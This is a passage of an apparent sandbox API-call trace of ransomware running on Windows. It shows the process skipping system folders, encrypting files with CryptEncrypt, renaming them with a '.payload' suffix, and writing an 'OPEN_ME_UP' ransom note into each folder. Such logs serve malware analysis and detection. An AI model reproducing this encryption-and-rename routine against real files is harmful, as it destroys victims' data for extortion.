pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.306] GetProcessHeap () returned 0x5e0000 [0059.306] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.306] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.307] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.308] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.308] GetProcessHeap () returned 0x5e0000 [0059.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.308] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.308] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.308] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.308] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.308] CloseHandle (hObject=0x438) returned 1 [0059.309] GetProcessHeap () returned 0x5e0000 [0059.309] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.309] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.310] GetProcessHeap () returned 0x5e0000 [0059.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.310] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.310] FindClose (in: hFindFile=0x606160 | out: hFindFile=0x606160) returned 1 [0059.310] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.310] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1043\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.311] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.312] CloseHandle (hObject=0x430) returned 1 [0059.312] GetProcessHeap () returned 0x5e0000 [0059.312] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.312] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1044", cAlternateFileName="")) returned 1 [0059.312] lstrcmpiW (lpString1="1044", lpString2="Windows") returned -1 [0059.312] lstrcmpiW (lpString1="1044", lpString2="$Recycle.bin") returned 1 [0059.312] lstrcmpiW (lpString1="1044", lpString2="System Volume Information") returned -1 [0059.312] lstrcmpiW (lpString1="1044", lpString2="Program Files") returned -1 [0059.312] lstrcmpiW (lpString1="1044", lpString2="Program Files (x86)") returned -1 [0059.312] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044") returned 30 [0059.312] lstrcmpW (lpString1="1044", lpString2=".") returned 1 [0059.312] lstrcmpW (lpString1="1044", lpString2="..") returned 1 [0059.312] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.312] GetProcessHeap () returned 0x5e0000 [0059.312] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.312] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\*") returned 32 [0059.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606160 [0059.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.313] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\.") returned 32 [0059.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.313] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.313] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\..") returned 33 [0059.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.313] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.313] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.313] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.313] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.313] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.313] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.314] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 39 [0059.314] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.314] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.314] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.314] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.314] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.314] GetTickCount () returned 0x114f425 [0059.314] GetTickCount () returned 0x114f425 [0059.314] GetTickCount () returned 0x114f425 [0059.314] GetTickCount () returned 0x114f425 [0059.314] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.314] GetProcessHeap () returned 0x5e0000 [0059.314] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.314] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xbe6, lpOverlapped=0x0) returned 1 [0059.315] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff41a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.316] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xbe6, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xbe6, lpOverlapped=0x0) returned 1 [0059.316] GetProcessHeap () returned 0x5e0000 [0059.316] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.316] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.316] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.316] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.316] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.316] CloseHandle (hObject=0x438) returned 1 [0059.317] GetProcessHeap () returned 0x5e0000 [0059.317] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.317] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.319] GetProcessHeap () returned 0x5e0000 [0059.319] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.319] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.319] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.319] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.319] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.319] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.319] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.319] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 48 [0059.319] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.319] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.319] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.319] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.319] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.319] GetTickCount () returned 0x114f435 [0059.319] GetTickCount () returned 0x114f435 [0059.319] GetTickCount () returned 0x114f435 [0059.319] GetTickCount () returned 0x114f435 [0059.319] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.320] GetProcessHeap () returned 0x5e0000 [0059.320] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.320] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.322] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.322] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.322] GetProcessHeap () returned 0x5e0000 [0059.322] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.322] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.322] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.322] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.322] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.322] CloseHandle (hObject=0x438) returned 1 [0059.324] GetProcessHeap () returned 0x5e0000 [0059.325] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.325] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.325] GetProcessHeap () returned 0x5e0000 [0059.325] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.325] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.325] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 49 [0059.325] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.325] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.325] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.325] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.325] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.326] GetTickCount () returned 0x114f435 [0059.326] GetTickCount () returned 0x114f435 [0059.326] GetTickCount () returned 0x114f435 [0059.326] GetTickCount () returned 0x114f435 [0059.326] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.326] GetProcessHeap () returned 0x5e0000 [0059.326] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.326] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.329] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.329] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.329] GetProcessHeap () returned 0x5e0000 [0059.329] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.329] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.329] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.329] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.329] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.329] CloseHandle (hObject=0x438) returned 1 [0059.331] GetProcessHeap () returned 0x5e0000 [0059.331] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.331] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.331] GetProcessHeap () returned 0x5e0000 [0059.331] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.331] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.331] FindClose (in: hFindFile=0x606160 | out: hFindFile=0x606160) returned 1 [0059.331] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.332] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1044\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.332] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.333] CloseHandle (hObject=0x430) returned 1 [0059.334] GetProcessHeap () returned 0x5e0000 [0059.334] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.334] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, 